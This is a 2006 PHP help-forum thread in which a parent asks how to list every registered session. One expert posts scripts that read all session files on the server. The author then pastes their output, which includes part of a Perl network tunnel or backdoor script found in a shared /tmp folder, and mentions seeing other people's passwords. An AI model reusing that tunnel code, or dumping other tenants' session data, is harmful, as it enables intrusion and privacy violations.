Creating a list of all registered sessions

Posted on 2006-05-10
Medium Priority
Last Modified: 2008-03-10
Last night my 11 years old son asked me if it's possible to create
a list of all registered sessions while I was reading a PHP
tutorial. I tried a "For each" loop, but had to give up
after receiving some errors.

I appreciate if somebody can show him (if possible) how to
create a list of all registered session.
Question by:MnInShdw
  • 5
  • 3
  • 2
  • +1
LVL 16

Accepted Solution

dr_dedo earned 2000 total points
ID: 16656612
try this

foreach ($_SESSION as $x)
echo $x;
LVL 40

Expert Comment

by:Richard Quadling
ID: 16657294
Dr_dedo, not just the variables for the current session, but all sessions.


PHP 5 code (required because I am using the SPL DirectoryIterator class).

foreach(new DirectoryIterator(session_save_path()) as $obj_Session)
      if ($obj_Session->isFile())
            $s_session_data = file_get_contents($obj_Session->getPathname());
            echo '<b>' . $obj_Session->getPathname() . '</b><br /><pre>' . var_export($s_session_data, True) . '</pre><br /><br />';

Works for me!
LVL 40

Expert Comment

by:Richard Quadling
ID: 16657351
You will probably have problems if the sessions are locked against a site (in a multiple hosted server), so only sessions on your own site.

I've just ran this on a friends server and the number of perl backdoor scripts present was frightening!
What does it mean to be "Always On"?

Is your cloud always on? With an Always On cloud you won't have to worry about downtime for maintenance or software application code updates, ensuring that your bottom line isn't affected.

LVL 16

Expert Comment

ID: 16657354
wow, niceeeeeeeeeee
LVL 40

Expert Comment

by:Richard Quadling
ID: 16657402
If you site is using the /tmp directory for the session files, then you will get a LOT of junk here too. So watch out when you run that script.

Author Comment

ID: 16657523
thanks dr_dedo  for your help.
I had forgotten to start the session in my script
and that was why it didn't work out.

And million thanks to RQuadling for trying to help
but unfotunately ixwebhosting is still on php4 and
I received "Unknown function" when I tried to
test the sample code.

One more time thanks to all who helped.
LVL 40

Expert Comment

by:Richard Quadling
ID: 16657721
The answer provided by dr_dedo has nothing to do with listing all the registered sessions!!!

It only allows you to look at your OWN current session.

And if you said you where on PHP4, I'd have given an appropriate answer.

You also did not say what your errors were.

This is an equivalent PHP4 script.

$obj_Dir = dir(session_save_path());
while(False !== ($s_file = $obj_Dir->read()))
      echo $s_file;
      if (!in_array($s_file, array('.', '..')))
            $s_session_data = file_get_contents(session_save_path() . "/$s_file");
            echo '<b>' . $s_file . '</b><br /><pre>' . var_export($s_session_data, True) . '</pre><br /><br />';

This will also work with PHP5, but the process is a lot easier in PHP5 with the SPL.

LVL 17

Expert Comment

ID: 16658078
Tell you 11 year old to keep into programming, its a lot of fun =)

Author Comment

ID: 16664598
Hi RQuadling

First of all my appologies for not mentioning the errors contents.

I did a copy and paste of your code and heaven.... I had a lot of things
in the result. the page contents was over several thousands lines
A lot of subs - functions - even other homepages were inserted in the result
but nothing about the session variables.
the frist line starts with several errors:
Warning: file_get_contents(/tmp/lost+found): failed to open stream: Permission denied in /hsphere/local/home/mydomain/mydomain.com/test2.php on line 8

I have even a lot of subs and functions
use IO::Socket;
use POSIX;
$localport = $ARGV[0];
$host      = $ARGV[1];
$port      = $ARGV[2];
$DIR = undef;
$| = 1;
if ($daemon){ $pid = fork; exit if $pid; die "$!" unless defined($pid); POSIX::setsid() or die "$!"; }
%o = (\'port\' => $localport,\'toport\' => $port,\'tohost\' => $host);
$ah = IO::Socket::INET->new(\'LocalPort\' => $localport,\'Reuse\' => 1,\'Listen\' => 10) || die "$!";
$SIG{\'CHLD\'} = \'IGNORE\';
$num = 0;
while (1) {
$ch = $ah->accept(); if (!$ch) { print STDERR "$!\\n"; next; }
$pid = fork();
if (!defined($pid)) { print STDERR "$!\\n"; }
elsif ($pid == 0) { $ah->close(); Run(\\%o, $ch, $num); }
else { $ch->close(); }
sub Run {
my($o, $ch, $num) = @_;
my $th = IO::Socket::INET->new(\'PeerAddr\' => $o->{\'tohost\'},\'PeerPort\' => $o->{\'toport\'});
if (!$th) { exit 0; }
my $fh;
if ($o->{\'dir\'}) { $fh = Symbol::gensym(); open($fh, ">$o->{\'dir\'}/tunnel$num.log") or die "$!"; }
while ($ch || $th) {
my $rin = "";
vec($rin, fileno($ch), 1) = 1 if $ch;
vec($rin, fileno($th), 1) = 1 if $th;
my($rout, $eout);
select($rout = $rin, undef, $eout = $rin, 120);
if (!$rout  &&  !$eout) {}
my $cbuffer = "";
my $tbuffer = "";
if ($ch && (vec($eout, fileno($ch), 1) || vec($rout, fileno($ch), 1))) {
my $result = sysread($ch, $tbuffer, 1024);
if (!defined($result)) {
print STDERR "$!\\n";
exit 0;

and there's a lot of passwords and database informations (obviously not mine)
the page never ends and the contents are adding, I had to hit stop and then Ctrl+Break.
I have even more than 20 other home pages embedded in the result.
this is one of them and is in the middle of the result

None of my registered session was in the result.
To me it doesn't appear to be the correct method of gathering the
registered session.

I appreciate your trying to help.
Million thanks

Author Comment

ID: 16664616
Hi BogoJoker
I told my son about your message, but his dad has a hard
time learning PHP at the age of 43.

Thank you for your input
LVL 40

Expert Comment

by:Richard Quadling
ID: 16665491
The session directory is quite often the /tmp folder on the server.

What you are seeing is ALL the content of the temp folder.

On my servers the session folder is NOT tmp. So I only see other people's sessions.


Featured Post

New feature and membership benefit!

New feature! Upgrade and increase expert visibility of your issues with Priority Questions.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

These days socially coordinated efforts have turned into a critical requirement for enterprises.
There are times when I have encountered the need to decompress a response from a PHP request. This is how it's done, but you must have control of the request and you can set the Accept-Encoding header.
The viewer will learn how to dynamically set the form action using jQuery.
The viewer will learn how to count occurrences of each item in an array.
Suggested Courses
Course of the Month15 days, 19 hours left to enroll

850 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question